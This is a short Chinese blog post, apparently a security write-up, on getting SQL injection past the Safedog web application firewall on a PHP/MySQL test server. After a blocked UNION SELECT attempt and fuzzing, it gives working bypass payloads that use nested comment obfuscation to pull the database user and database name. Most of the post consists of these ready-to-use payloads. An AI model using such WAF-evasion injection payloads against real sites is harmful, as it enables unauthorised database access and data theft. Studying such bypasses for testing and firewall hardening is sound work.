测试环境:
Windows XP + php + Apache 2.4.10 + mysql
1、版本
2、尝试
**.**.**.**/sql.php?id=-1/*!UNION ALL*//*!SELECT*/1,2,3
被拦截
难道是拦截union?select?还是关键字组合?以前安全狗版本还能看到正则,现在直接内置加密了。。。逆不出来了。然后fuzzing一个个测试3、绕过防护全开
payload:
**.**.**.**/sql.php?id=-1/*/\*/UNION/*/\*/SELECT/*/\*/1,/*!USER*/(),uuid()
**.**.**.**/sql.php?id=-1/*/\*/UNION/*/\*/SELECT/*/\*/1,/*!database*/(),uuid()
如上
规则升级
阅读:252081 | 评论:0 | 标签:注入 安全狗
姓名:
邮箱:
网址:
验证码: